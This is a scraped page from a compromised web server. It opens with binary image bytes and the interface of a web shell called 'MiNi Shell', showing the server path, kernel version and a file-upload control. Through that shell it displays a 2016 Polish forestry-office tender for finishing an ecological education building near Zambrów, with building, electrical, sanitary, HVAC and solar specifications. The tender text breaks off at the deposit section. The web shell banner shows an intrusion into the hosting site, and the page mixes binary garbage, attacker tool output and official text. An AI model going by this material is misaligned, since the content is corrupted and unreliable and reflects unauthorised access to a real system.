JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160302/46350-N-2016.html

<p class="kh_header"><b>Łomża: Wykonanie II etapu budowy budynku izby edukacji ekologicznej z częścią gospodarczą w Czerwonym Borze 70 gm. Zambrów</b><br>
<b>Numer ogłoszenia: 46350 - 2016; data zamieszczenia: 02.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Łomża , ul. Nowogrodzka 60, 18-400 Łomża, woj. podlaskie, tel. 086 2165494, faks 086 2164027.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.lasy.gov.pl/pl/bip/dg/rdlp_bialystok/nadl_lomza/zamówienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna skarbu państwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie II etapu budowy budynku izby edukacji ekologicznej z częścią gospodarczą w Czerwonym Borze 70 gm. Zambrów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót II etapu budowy budynku izby edukacji ekologicznej z częścią gospodarczą w Czerwonym Borze 70  wg posiadanej kompletnej dokumentacji projektowej. W drugim końcowym etapie planowane jest wykonanie robót budowlanych wykończeniowych  i instalacyjnych  wg następujących elementów:
1. Roboty budowlane wykończeniowe:
- stolarka drzwiowa wewnętrzna i parapety,
- elewacja budynku,
- tynki i okładziny ścian oraz sufitów parteru,
- posadzki,
- docieplenie stropu poddasza,
- roboty w zakresie zagospodarowania terenu:
   - nawierzchnie utwardzone,
   - zieleń.
2. Roboty elektryczne:
- trasy kablowe, przyłącze do budynku,
- układanie kabli i przewodów,
- rozdzielnice,
- oprawy oświetleniowe, oświetlenie administracyjne
- osprzęt,
- okablowanie strukturalne,
- instalacja odgromowa i uziemiająca,
- instalacja oraz przejście p.poż.,
- pomiary.
3. Instalacje sanitarne:
- przyłącze kanalizacyjne i wodociągowe,
- instalacja wodociągowa,
- kanalizacja sanitarna,
4. Instalacja klimatyzacyjna.
5. Instalacja wentylacji grawitacyjnej.
6. Instalacja solarna. 
Szczegółowy zakres robót do wykonania w II etapie określa dokumentacja techniczna i przedmiary i obejmuje wykonanie:
1.Roboty budowlane wykończeniowe -
Stolarka okienna i drzwiowa: wg wykazu stolarki okiennej i drzwiowej. 
Schematy stolarki projektowanej wg rysunków, indywidualne. 
Drzwi wewnętrzne przedsionek - pełne drewniane, o gr. skrzydła 92mm, drzwi w systemie przylgowym, ramiak skrzydła wzmocniony, pozycje drzwi wodoodporną sklejką, próg aluminiowy z wkładką termiczną, impregnowane, drzwi prawe - sztuk 1 
Drzwi z Sali głównej wyjściowe dwuskrzydłowe z doświetlem, wyposażone w szkło bezpieczne o szer. skrzydła po otwarciu minimum 0,9m. 
Drzwi z holu wewnętrzne do pomieszczeń pełne drewniane indywidualne. 
Drzwi wewnętrzne do pomieszczeń sanitarnych drewniane. Wszystkie drzwi z ościeżnicą regulowaną w kolorze: ciemny brąz, naturalne drewno 
We wszystkich pomieszczeniach sanitarnych należy zastosować drzwi z kratką nawiewną u dołu o wolnym przekroju 220 cm2.
Elewacja:
wykończenie ścian zewnętrznych- 
Uwaga: zastrzega się kompleksowe wykonywanie docieplenia łącznie z wyprawami zewnętrznymi tylko w wybranym systemie ściśle wg instrukcji technologicznych i materiałowych producenta.
System musi posiadać świadectwo dopuszczenia do stosowania w budownictwie, niezbędne atesty i certyfikaty na system . 
Ściany budynku ocieplone zostaną wełną mineralną gr. 12cm i rusztem montażowym z deskowaniem. Płyty mocować za pomocą kleju oraz mechanicznie za pomocą kołków. 
Kolor deskowania - brązowy. 
Ściana zewnętrzna budynku - okładzina drewniana wnęka wejściowa parteru w przestrzeniach międzyokiennych oraz w elewacjach bocznych ściany szczytowe. 
- drewno - sosna, klasa I - III; 
- deska elewacyjna sosnowa, np.: szerokość 120 mm, grubość 20 mm; o klasie odporności na warunki atmosferyczne surowej deski +10 lat; długość desek od 120cm, 
- łączenie desek elewacyjnych blachami systemowymi lub na śruby 
- łączenie desek na długości z odstępem 2 mm w układzie nieregularnym z założeniem, że odstęp między łączeniami nie powinien być mniejszy niż 50 cm we wszystkich kierunkach; 
- obróbka glifów okiennych pionową deską; 
- drewno zabezpieczyć przeciwogniowo lakierem np.: UNIEPAL - DREW lub analogiczny (przeznaczony jest do ogniochronnego zabezpieczania i dekoracyjnego wykończenia powierzchni elementów budowlanych z drewna oraz sklejki, stosowanych wewnątrz i na zewnątrz obiektów pomieszczeń mieszkalnych i użyteczności publicznej. Okładzina ścienna pomalowana lakierem UNIEPAL-DREW w ilości co najmniej 200 g/m2, została sklasyfikowana jako nierozprzestrzeniająca ognia (wg PN-90/B-02667/Az1:2001). Drewno przed pokryciem np.: UNIEPAL - DREW - (lub analogiczny )który jest środkiem na rozcieńczalnikach ftalowych można pokolorować impregnatem koloryzującym: bez związków lakierniczych lub równoważnym zawierającym środek przeciwgrzybiczy. 
- preparat koloryzujący wg wybranego koloru z palety preparatów elewacyjnych - naturalne drewno, 
- podkonstrukcja: 
- ruszt krzyżowy 
- kantówka sosnowa 60 x 40 mm oraz 60 x 60 mm 
- podkówki pod ruszt 20 x 60 x 60 mm ze sklejki wodoodpornej 
- listwa wentylacyjna 20 x 10 mm 
- impregnacja rusztu np.: FOBOS M-4 lub analogiczny 
- materiał izolacyjny wełna mineralna np.: ROCKWOOL Superrock 12cm lub analogiczny 
- wiatroizolacja - membrana paroprzepuszczalna np.:COROTOP Classic lub analogiczna.
Tynki i okładziny ścian oraz sufitów:
ściany korytarzy, pomieszczeń, tynkowane tynkiem cem-wap. kat. lII, malowanie i gruntowanie farbą emulsyjną, lateksową w kolorach beż jasny wg zał. kolorystyki. 
Pomieszczenia sanitariatów malowane na biało farbą emulsyjną łazienkową. Ściany wykończone płytką glazurowaną do pełnej wysokości. 
Fugowanie należy prowadzić wg sztuki budowlanej i zaleceń producentów chemii budowlanej. 
Fuga w kolorze: beż, kość słoniowa.
Posadzki :
we wszystkich pomieszczeniach - gres, antypoślizgowy w klasie ścieralności IV, gat.I. kolor jasny beż- brąz ( rozwiązania indywidualne) Wzór płytki jednolity bez powtarzalności. 
Wykonać cokoły wys. 10 cm na kleju w kolorze j.w. 
Kolorystyka posadzki dobrana np: płytka o wymiarach 44x90cm - jasny beż, struktura naturalna o współczynniku antypoślizgowości R10 i ścieralności minimum 175mm3 lub analogiczna o nie gorszych parametrach. 
Docieplenie stropu poddasza:
Ruszt drewniany na stropie: zabezpieczenie wełny przed uszkodzeniem o powierzchni 4,8m2, wykonany z legarów drewnianych impregnowanych wysokości 30cm, gr. 6cm ułożony w osiach co 62cm. Pokryty deską o gr. 2,8cm.
Nawierzchnie utwardzone i zieleń:
Nawierzchnię utwardzoną zaprojektowano z kostki betonowej, grub. 8cm na podsypce cem.-piaskowej grub. 3cm, podbudowie grub. 20cm z mieszanki kruszywa naturalnego z dodatkiem łamanego w ilości 18% oraz w przypadku podłoża wątpliwego warstwie filtracyjnej z piasku (30cm), stabilizowanego mechanicznie. Kolor kostki i krawężników szary. Chodnik wykonać jak na rysunkach z kostki betonowej z warstwami j.w. Kolor kostki na chodniku - grafitowy. 
Dojazd bezpośrednio poprzez projektowaną bramę wjazdową w istniejącym ogrodzeniu. Brama o szerokości 3,0 m w świetle. 
Projektowane miejsca parkingowe wzdłuż dojazdu do projektowanego budynku: 6 sztuk o wymiarach 5,0 x 2,5m w tym jedno miejsce dla osób niepełnosprawnych o wymiarach 5,0 m x 3,6m.
Teren wokół budynku wzmocnić ziemią urodzajną 10 cm oraz wykonać trawnik dywanowy siewem z nawożeniem.
2.Roboty elektryczne -
Trasy kablowe, przyłącze do budynku:
zasilanie pomieszczeń wykonane z projektowanego złącza kablowego z szafką pomiarową (według oddzielnego opracowania PGE). Rozdzielnica główna zostanie zasilona kablem YKY 5x10mm2. Rozdzielnicę zaprojektowano jako podtynkową.
Rozdział energii elektrycznej:
tablice wyposażone zostaną w wyłączniki nadprądowe o parametrach i ilości odpowiadającej przewidzianym obwodom. Przewidziano wyłączniki nadprądowe o charakterystyce B i C. Dla ochrony od porażeń zainstalowane zostaną wyłączniki przeciwporażeniowe różnicowoprądowe bezpośredniego działania o prądzie różnicowym 30mA. Dla ochrony od przepięć łączeniowych zainstalowane zostaną ochronniki przeciwprzepięciowe.
Instalacja gniazd wtykowych:
instalację gniazd wtykowych należy wykonać przewodami YDYZo 3x2,5 mm2 układanymi pod tynkiem. Gniazda instalować ze stykiem ochronnym a w łazienkach i pomieszczeniach gospodarczych stosować osprzęt szczelny IP44. Przy zastosowaniu osprzętu modułowego w miejscach instalowania zestawów, gniazd i wyłączników należy zastosować puszki instalacyjne o rozstawie odpowiadającym szerokości modułów. Gniazdka wtyczkowe montować na wysokości 0,3m (w pomieszczeniach wilgotnych na wysokości 1,4m)od poziomu podłogi lub aranżacji danego pomieszczenia.
Instalacja oświetleniowa:
instalację oświetleniową należy wykonać przewodami YDY 3x1,5, 4x1,5 układanymi pod tynkiem na ścianach i suficie. Łączenie przewodów należy wykonać w puszkach instalacyjnych za pomocą szybkozłączek np. WAGO; przy takim wykonaniu należy instalować puszki pogłębiane. Oprawy oświetleniowe stosować zgodnie ze schematami instalacji oświetleniowej. Sterowanie oświetlenia zaprojektowano za pomocą łączników załączających. Osprzęt łączeniowy montować w pionie na wysokości 1,1m od poziomu projektowanej podłogi. Na głównych ciągach komunikacyjnych przewidziano oświetlenie ewakuacyjne. Oprawy ewakuacyjne wyposażyć w piktogram wskazujący kierunek ewakuacji. W oprawach ewakuacyjnych zaprojektowano moduły awaryjne 1h. Awaryjne oświetlenie ewakuacyjne powinno działać w przypadku uszkodzenia jakiejkolwiek części zasilania oświetlenia podstawowego.
Ochrona przeciwporażeniowa:
jako dodatkowy system ochrony od porażeń prądem elektrycznym przewiduje się zastosowanie samoczynnego wyłączania. Budynek będzie pracował w układzie sieci TN-S. Dodatkowo zastosowane zostaną wyłączniki przeciwporażeniowe różnicowoprądowe bezpośredniego działania.
Instalacja połączeń wyrównawczych:
przy rozdzielnicy głównej zostanie zainstalowana miejscowa szyna wyrównawcza, którą należy połączyć bezpośrednio z główną szyną wyrównawczą przewodem Ly(so)16mm2. Do miejscowej szyny wyrównawczej (uziemiającej) należy podłączyć za pomocą przewodów Ly (so)16mm2:
-przewody ochronne
-metalowe rury instalacji sanitarnych, gazowych i innych
-metalowe brodziki, baseny, zlewy itp.
-zbrojenie konstrukcji budynku oraz metalowe elementy budynku
Instalacja odgromowa:
zwody odprowadzające instalacji odgromowej wykonać należy drutem stalowym cynkowanym ogniowo o średnicy min. fi 8mm. Pionowe zejścia układać pod elewacją budynku w rurach PVC grubościennych wykonanych z materiałów szybko gasnących.
Zwody odprowadzające połączyć z projektowanym uziomem otokowym poprzez złącza kontrolne umieszczone w obudowach odgromowych montowanych w gruncie. Instalację odgromową połączyć za pomocą bednarki Fe Zn 25x4mm ze zbrojeniem ław fundamentu. Bednarkę ze zbrojeniem ławy fundamentowej łączyć za pomocą spawu.
Połączenie należy zabezpieczyć antykorozyjnie np. za pomocą farby antykorozyjnej.
Rezystancja uziomu dla instalacji odgromowej nie powinna przekraczać 10. Przewody uziemiające należy chronić przed korozją poprzez malowanie farbą antykorozyjną lub lakierem asfaltowym na wysokości do 30cm nad ziemią i do głębokości 20cm w ziemi.
Na dachu należy za pomocą drutu odgromowego cynkowanego ogniowo fi 8mm połączyć wszystkie elementy wystające tj. komin, rynny itp. Miejsca połączeń drutu łączyć uniwersalnymi uchwytami krzyżowymi drut/drut Fe Zn.
Ochrona przeciwprzepięciowa obiektu zrealizowana zostanie za pomocą: stworzenia strefy ochronnej przez instalację odgromową, zastosowanie ochronników przeciw przepięciowych oraz połączenia ekwipotencjalne. Zadaniem ochrony jest zminimalizowanie ujemnych skutków działania udarów prądowych i napięciowych występujących w sieci elektroenergetycznej niskiego napięcia oraz impulsowego pola elektromagnetycznego.
Instalacja strukturalna:
zaprojektowano instalację strukturalną kategorii 5 przewodem UTP4x2x0,5 mm2.
Cała sieć posiada topologię gwiazdy z jednym głównym punktem dystrybucyjnym pozwalającym dowolnie konfigurować sieć strukturalną. Wszystkie przewody UTP4x2x0,5 mm2 z gniazd sieciowych RJ45 należy sprowadzić do pomieszczenia oznaczonego jako (Aneks) w którym zaprojektowano wiszącą naścienną szafę typ RACK. Główny punkt dystrybucyjny należy zasilić z rozdzielnicy głównej.
Pomiary:
pomiar należy wykonać za pomocą miernika sieci strukturalnej. Należy dokonać pomiarów:
- długości przewodu,
- opóźnienia propagacji,
- impedancji rezystancji,
- tłumienia sygnału w zakresie do 450MHz
- przesłuchu zbliżnego na końcu toru transmisji NEXT
- stosunku tłumienia do przesłuchu ACR
- PSNEXT, PSACR, ELFEXT i PSELFEXT
Rezystancję izolacji należy zmierzyć:
- między przewodami roboczymi branymi kolejno po dwa,
- między każdym przewodem roboczym i ziemią, lub między każdym przewodem roboczym a pozostałymi zwartymi i uziemionymi.
W układzie TNC, przewód PEN traktuje się jako część uziomu. Próbę należy przeprowadzić na urządzeniach odłączonych od napięcia po odłączeniu odbiorników, zwłaszcza elektronicznych, nieodpornych na napięcie probiercze. Również należy odłączyć ochronniki przepięciowe np. warystorowe, które wprowadzają błąd pomiarowy.
Jeżeli włączone w obwód urządzenia elektroniczne nie można odłączyć, norma dopuszcza wykonanie pomiaru między połączonymi przewodami fazowymi i neutralnym a ziemią.
Pomiar należy wykonać prądem stałym a przyrząd probierczy powinien, przy obciążeniu prądem 1mA, zapewniać napięcie probiercze w wysokości 500V.
Wynik należy uznać za pozytywny jeżeli rezystancja izolacji obwodu nie jest mniejsza niż 0,5M.
3.Instalacje sanitarne -
Przyłącze kanalizacyjne:
kanalizację DN 160 odprowadzającą ścieki z budynku leśniczówki należy wykonać z rur i kształtek PCV. Połączenia należy wykonać za pomocą pierścienia gumowego dostosowanego do odpowiedniej średnicy przewodu. Przejście przez ścianę fundamentową wykonać jako szczelne (zabezpieczenie łańcuchowe) w rurze osłonowej. W celu zabezpieczenia przed przemarzaniem rur należy obsypać je warstwą keramzytu o grubości 20-30cm.
Studzienki (3szt) zlokalizowane na terenie zielonym wykonane będą jako prefabrykowana PVC D400. Należy  wyposażyć studzienki we właz typu lekkiego.
W celu zapewnienia wentylacji podejść, piony kanalizacyjne należy zakończyć wywiewkami kanalizacyjnymi ponad dachem budynku oraz wykonać odpowietrzenie boczne. Na pionach zamontować rewizję. 
Przewody pod posadzką ( w budynku wykonane są podkłady pod posadzki ) układać w obsypce  piaskowej.
Po ułożeniu rurociągów należy wykonać próbę wodną zgodnie z PN-92/B-10735 poddając rurociąg działaniu ciśnienia 0,3 bar przez czas 15 min. Próba jest pozytywna gdy na złączach nie pojawią się kropelki wody i dopełniana ilość wody nie przekroczy w czasie próby 0,02 l/m2 powierzchni rury. Próbę wykonać przy odsłoniętych złączach i wlotach do studzienek. Po próbach i odbiorze rurociągi obsypać 20-30cm warstwą keramzytu. 
Roboty ziemne należy wykonać ręcznie i mechanicznie z odkładem urobku obok wykopu. Zasypywanie wykopów prowadzić ręcznie warstwami do grubości 30 cm ponad wierzch rurociągu z jednoczesnym ubijaniem ziemi, a następnie mechanicznie. 
Trasy oraz średnice pokazano w części graficznej opracowania.
Instalacja kanalizacyjna wewnętrzna -
zaprojektowano instalację kanalizacyjną podłączoną do trzech pionów kanalizacyjnych Dn110. Instalację zaprojektowano ze zwykłych rur PCV łączonych na wcisk z wykorzystaniem uszczelek gumowych. Piony kanalizacyjne wyprowadzić nad dach zakończając wywiewkami kanalizacyjnymi uszczelniając przejścia dachowe. W najniższym punkcie pionów należy zamontować czyszczaki rewizyjne oraz zapewnić do niech dostęp. 
Należy zapewnić odprowadzenie skroplin z instalacji klimatyzacyjnej. Rury ze skroplinami dn 32 należy wyprowadzić przez ściany frontowe na zewnątrz budynku. W okresie zimowym należy zaślepić odpływy skroplin.
Trasy oraz średnice pokazano w części graficznej opracowania.
Przyłącze wodociągowe  - 
Projektowany budynek zasilany będzie z projektowanej instalacji wodociągowej doziemnej. Instalacja doziemna będzie podłączona do istniejącej instalacji wodociągowej w istniejącym budynku znajdującym się na działce Inwestora. Do istniejącego wodociągu zostanie wykonane wcięcie, które obsłuży projektowaną instalację doziemną.
Rurociąg wodociągowy doziemny zmontowany będzie z rur PE o średnicy 32x3,0mm PN10. Na wejściu wody do budynku zamontować (patrząc zgodnie z kierunkiem przepływu) zawór odcinający DN25, wodomierz DN20, zawór odcinający DN25, zawór antyskażeniowy DN25.
Roboty ziemne należy wykonać ręcznie i mechanicznie z odkładem urobku obok wykopu. Zasypywanie wykopów prowadzić ręcznie warstwami do grubości 30 cm ponad wierzch rurociągu z jednoczesnym ubijaniem ziemi a następnie mechanicznie.
Rurociągi należy montować w gotowym wykopie na podsypce z pospółki grubości 10 cm, na głębokości 1,8 m od powierzchni terenu do wierzchu rury.
W odległości 30 cm nad rurociągiem należy ułożyć taśmę ostrzegawczą z PVC koloru niebieskiego. Całość robót wykonać zgodnie z Warunkami technicznymi wykonania i odbioru robót montażowych cz. II oraz instrukcji montażowej rurociągów z PE producenta rur.       
Należy wykonać próbę szczelności instalacji doziemnej. W czasie trwania próby na ciśnienie 1.0 MPa, skontrolować wszystkie złącza a w przypadku stwierdzenia wycieku wody w czasie próby, złącza poprawić lub wykonać ponownie i próbę przeprowadzić raz jeszcze. 
Po wykonaniu próby szczelności należy wykonać dezynfekcję oraz płukanie rurociągu. Do dezynfekcji należy stosować podchloryn sodu w ilości 50 mg/dm3, czas kontaktu 24 h. Po dezynfekcji przyłącze należy dokładnie przepłukać używając do tego celu wody czystej. Woda dla potrzeb dezynfekcji i płukania pobrana zostanie z istniejącego układu wodociągowego.
Roboty ziemne należy wykonać ręcznie i mechanicznie z odkładem urobku obok wykopu. Zasypywanie wykopów prowadzić ręcznie warstwami do grubości 30 cm ponad wierzch rurociągu z jednoczesnym ubijaniem ziemi a następnie mechanicznie. 
Trasy oraz średnice pokazano w części graficznej opracowania.
Instalacja wody zimnej i ciepłej -
Doprowadzenie wody do projektowanego budynku z istniejącego budynku znajdującego się na działce Inwestora. Przyłącze należy wykonać z rury PE D32x2,0 PN10 SDR17. W istniejącym sąsiednim budynku należy wciąć się do instalacji wody zimnej za zestawem hydroforowym znajdującym się w piwnicy. Wejście wody do projektowanego budynku będzie w pomieszczeniu wiatrołapu.
Ciepła woda będzie uzyskiwana  z pompy ciepła z wbudowanym bezciśnieniowym buforem o pojemności 500l.
Na wejściu wody do projektowanego budynku zamontować (patrząc zgodnie z kierunkiem przepływu) zawór odcinający DN25, wodomierz 2,5m3/h DN 20, zawór odcinający DN25, zawór antyskażeniowyDN25.
Następnie woda będzie rozprowadzona do poszczególnych przyborów sanitarnych za pomocą rur PE wielowarstwowych z wkładką aluminiową o połączeniach zaprasowywanych. Instalacja prowadzona będzie w posadzce ( w budynku wykonane są podkłady pod posadzki ).
Obliczeniowy przepływ wody zimnej dla budynku wynosi 0,55 l/s (1,98 m3/h).
4.Instalacja klimatyzacyjna-
Zaprojektowano instalację klimatyzacyjną i grzewczą obsługiwaną przez klimakonwektory ścienne przypodłogowe (8szt). Zaprojektowano instalacje ciśnieniową nisko temperaturową. Na urządzeniach będzie realizowany proces grzania i chłodzenie w zależności od potrzeby uzyskania komfortu w danych pomieszczeniach. 
Parametry czynnika energetycznego :
- dla systemu grzewczego w okresie postojowym  20-15°C,
- dla systemu grzewczego w okresie normalnego użytkowania 35-30°C,
- dla systemu chłodniczego 10-15°C 
Czynnik będzie dostarczany z pompy ciepła do klimakonwektorów systemem rur miedzianych. Rozprowadzenie w posadzce a podejścia pod urządzenia w bruzdach ściennych.  Pompę ciepła należy połączyć z jednostką zewnętrzną rurami miedzianymi chłodniczymi. Rozprowadzenie nad sufitem podwieszanym. Rury należy zaizolować izolacją kauczukową o gr. 20mm ( rury śr. d18-d22) lub 30mm (rury śr d28-d35)
Trasy oraz średnice pokazano w części graficznej opracowania.
5.Instalacja wentylacji grawitacyjnej -
Z uwagi na względy higieniczne w pomieszczeniach: łazienki, wc, aneksie kuchennym, pom. gospodarczym zaprojektowano wyciąg zużytego powietrza. Zaprojektowano wentylatory wyciągowe (8 szt) podpięte pod kanały grawitacyjne. Powietrze będzie usuwane kanałami typu spiro na zewnątrz budynku poprzez wyrzutnie dachowe. 
6.Instalacja solarna -
Zaprojektowano dwa kolektory płaskie, harfowe o łącznej powierzchni czynnej 4,7 m2 współpracujące z pompą ciepła z zintegrowanym buforem 500l  do ogrzewania ciepłej wody użytkowej. Projektowana instalacja ma zapewnić 385 l/h c.w.u.  Zasada działania układu solarnego opiera się na zależności, jeśli jest odpowiednia ilość ciepła słonecznego i gdy  instalacja  zbiornika buforowego jest  w stanie przyjąć dodatkowe  ciepło, obie pompy wchodzące  w skład solarnego modułu regulacyjno-pompowego  są włączane na krótki czas i napełniają kolektory wodą z buforu. Po zakończeniu procesu napełniania który trwa krócej niż minutę, jedna pompa jest wyłączana a obieg wody jest podtrzymywany przez drugą pompę.  Natomiast jeśli słońce nie świeci wystarczająco mocno lub jeżeli moduł nie potrzebuje więcej ciepła, pompa cyrkulacyjna wyłącza się, cała instalacja słoneczna jest opróżniana, a woda z niej trafia do buforu. W celu spełnienia warunku opróżniania grawitacyjnie kolektorów należy rurę powrotną instalacji solarnej prowadzić ze spadkiem 2% od kolektora do pompy ciepła aby nie dopuścić do powstawania syfonów na instalacji. Lokalizacja i szczegóły w części graficznej opracowania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.11.00.00-1, 45.40.00.00-1, 45.31.00.00-3, 45.33.20.00-3, 45.33.11.00-7, 45.33.12.20-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca składający ofertę wnosi wadium w wysokości 
        10 000,00 zł ( słownie : dziesięć tysięcy  zł.)</p>
<p><b>III.2) ZALICZKI</b></p>
